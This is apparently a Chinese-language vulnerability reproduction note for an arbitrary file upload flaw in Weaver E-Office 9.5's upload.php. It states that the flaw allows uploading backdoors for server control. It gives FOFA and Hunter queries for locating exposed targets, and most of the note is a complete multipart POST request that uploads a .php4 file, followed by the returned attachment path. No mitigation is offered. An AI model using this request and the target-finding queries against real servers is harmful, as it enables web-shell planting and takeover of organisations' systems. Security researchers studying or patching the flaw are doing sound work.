泛微E-Office /upload/upload.php任意文件上传漏洞
一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。<font style="color:rgba(0, 0, 0, 0.9);">泛微E-Office /upload/upload.php存在任意文件上传漏洞,利用文件上传漏洞上传后门文件获取服务器控制权限。</font>
<font style="color:rgb(0, 0, 0);">二、影响版本</font>
- <font style="color:rgb(0, 0, 0);">泛微 E-Office 9.5</font>
<font style="color:rgb(0, 0, 0);">三、资产测绘</font>
fofa app="泛微-EOffice"
hunter app.name="泛微 e-office OA"- 特征
<font style="color:rgb(0, 0, 0);">四、漏洞复现</font>
POST /webservice/upload/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate, br
Content-Type:multipart/form-data; boundary=--------------------------553898708333958420021355
----------------------------553898708333958420021355
Content-Disposition: form-data; name="file"; filename="qq_test.php4"
Content-Type: application/octet-stream
qqtest
----------------------------553898708333958420021355--
attachment/2872504751*qq_test.php4